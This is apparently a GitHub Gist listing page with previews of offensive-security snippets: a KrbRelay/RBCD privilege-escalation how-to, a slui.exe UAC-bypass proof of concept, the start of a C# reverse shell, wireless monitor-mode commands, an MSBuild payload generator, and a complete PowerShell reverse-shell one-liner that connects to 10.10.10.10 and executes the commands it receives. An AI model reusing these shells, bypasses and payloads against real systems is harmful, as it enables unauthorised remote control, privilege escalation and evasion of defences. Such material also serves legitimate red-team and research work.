Skip to content

Instantly share code, notes, and snippets.

@HackingLZ
HackingLZ / vdm_lua_extract.py
Last active January 20, 2026 20:25
VDM Lua Extractor
### Original script and research by commial
### https://github.com/commial/experiments/tree/master/windows-defender
### Set LUADec_Path to binary
### https://github.com/viruscamp/luadec
import struct
import argparse
import sys
import os
import io
import subprocess
@tothi
tothi / krbrelay_privesc_howto.md
Last active January 24, 2026 07:17
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@r00t-3xp10it
r00t-3xp10it / SluiPOC.ps1
Last active August 20, 2025 12:26
slui.exe (ChangePK) Privilege escalation POC
<#
.Author:
@r00t-3xp10it - version 1.2
.Disclosure:
@mattharr0ey
https://medium.com/@mattharr0ey/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b
.DESCRIPTION:
How does Slui UAC bypass work? There is a tool named ChangePK in System32 has a service that opens a window (for you)
@mrjamiebowman
mrjamiebowman / ReverseShell.cs
Last active July 31, 2024 05:35
C# Simple Reverse Shell Code
namespace RevShell
{
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
namespace ConnectBack
# put your network device into monitor mode
# Turn off Int
Set interface down
sudo ip link set wlan0 down
# Set monitor mode
iwconfig wlan0 mode monitor
# Turn up interface
ip link set wlan0 up
@egre55
egre55 / powershell_reverse_shell.ps1
Last active January 27, 2026 21:46
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@mgeeky
mgeeky / generateMSBuildPowershellXML.py
Last active September 12, 2024 05:09
Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
#!/usr/bin/python3
#
# Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or
# .NET/CLR assembly EXE file into inline-task XML file that can be further launched by:
# %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#
# Requirements:
# - pefile
#
# Mariusz B. / mgeeky, <[email protected]>